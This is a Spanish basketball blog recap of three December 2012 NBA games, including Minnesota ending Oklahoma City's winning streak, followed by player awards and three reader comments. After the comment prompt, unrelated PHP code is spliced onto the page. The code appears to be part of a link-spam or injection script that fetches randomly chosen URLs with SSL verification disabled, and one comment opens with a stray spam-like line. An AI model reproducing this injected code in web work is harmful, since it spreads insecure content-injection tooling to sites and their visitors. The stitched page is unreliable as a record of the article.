La Crónica: Fin a la racha de los Thunder

21 de December de 2012 por TheDeerHunter

Que Minneapolis se iba a convertir en una plaza de lo más incómoda se veía venir de lejos. Frío, un equipo cada día más fuerte y una grada con ganas de caldear el asunto. Anoche lo comprobó en sus carnes el líder de conferencia, Oklahoma, el equipo más en forma del momento. La racha se queda en 12.

Demasiado solos se quedaron Durant y Wesbrook. Kevin Martin fue baja y el rocoso juego interior hizo aguas contra Love y Pek. No fue la noche de Ricky, en lógico proceso de reinserción, pero a cambio hizo mucho daño el pequeñín Barea, produciendo más él sólo que todo el banquillo de los Thunder sumando a Perkins y Sefolosha (93-99).

En el Rose Garden, Denver dio la de arena, que es cuando se aleja del calor de los suyos. Sorprende las dos versiones de los Nuggets, como Jekyll y Mr. Hyde. Anoche les tocó disfrutarlo a Portland incluso sin Aldridge. 0 de 22 en triples, se dice pronto, especialmente si los locales no cuentan con sus mejores armas por dentro. Así lograron hacer parecer a Hickson un Russell reencarnado (93-101). 

Por último, paseo de los Heat en antaño plaza maldita como lo fue el American Airlines de Dallas. Turbo para empezar, sin mucho color en los 3 primeros cuartos y todo un último de “Garbage Time”. Buena oportunidad para inflar minutos de los Crowder, Bernard James, Beaubois y Dominique Jones… y poco más (110-95).

PREMIOS

MVP: Kevin Love, coqueteando con triple doble. 28-11-7 más dos tapones de regalo.

Rookie: Nos encanta Alexey Shved. A 3 rebotes del triple doble. 12 puntos, 12 asistencias, 7 rebotes fabulosos. Damian Lillard algo más flojo con dos asistencias y 3 rebotes menos, algo gris en el tiro.

Sorpresa: Del solar que tienen los Blazers en el banco ayer se destapó Luke Babbit con un notable partido. Terminaría expulsado, pero 8 rebotes y 4 triples que fueron decisivos para amarrar la victoria.

Decepción: Ver el box de tiro de los Denver Nuggets, especialmente de los titulares hace daño a la vista. Gallinari 1 de 10, Faried 3 de 10, Iguodala 0 de 6 en triples, Lawson 0 de 4… Lo de los triples un auténtico desastre.

Esfuerzo en vano: Russell Westbrook rozando el triple doble 30-11-9 (casi cuadrúple con las pérdidas) más 3 robos… y Kevin Durant 33-7-6 más otros 3 robos. Lo salvaje es lo que están produciendo estos dos monstruos más allá de la anotación este año.

Imágenes | AP Photos / Getty Images

Comenta

3 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Acabo de terminar el Thunder-Wolves y la verdad es que los Thunder han echado en falta a Martin más de lo que se pudiera pensar. En su ausencia, sólo Durantula y Westbrook han sido consistentes en ataque y los Wolves siempre han llevado la iniciativa del partido apoyados en partidazo de Love y enormes Shved, Barea y Pekovic que se comió con patatas a un Perkins que cada día se entiende menos la millonada que cobra cuando ya ni defiende en condiciones a los pivots rivales. Aún así los Thunder tienen 2 seguros de vida que les van a hacer ganar muchos partidos de regular season pero veremos si resulta llegados a PO.

      Citar

  2. rumbero dice:
    #2

    0/22!! ¿En el Rose Garden han hecho los aros más pequeños o que pasa? Si no hace ni dos semanas que los Blazers se cascaron un 0/20

    Viendo el Wolves-Thunder yo añadiría a lo dicho que Westbrook no ha estado bien. Es tan bueno que se queda cerca del triple doble pero ha vuelto a enseñar su versión sólo contra el mundo cuando hay que remontar el partido. Tremendo el último cuarto de Barea

      Citar

  3. Pikerton64 dice:
    #3

    Where Exámenes Happens.
    Increíble partido Wolf contra OKC. Contra Miami no me importa mucho porque contaba con esa derrota. Love volvió a jugar como un MVP contra OKC y Barea, después de ser humillado por la defensa de N Cole lo hizo genial contra los Thunder. Shved hizo el doble de asistencias de lo que dice el boxscore, solo que por no ser famoso… Pek mereció el MIP el año pasado y wow, como juega cuando le buscan. Los Wolves tienen una pareja interior brutal, con un Pek que no falla debajo del aro y un Love que si tira como este partido es imparable. Ricky fuera contra los campeones… y contra los subcampeones. Ya volverá, y seguramente en menos partidos de los que necesitó Luv.

    Westbrook desquiciado y Durant fallando dos triples clutch.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>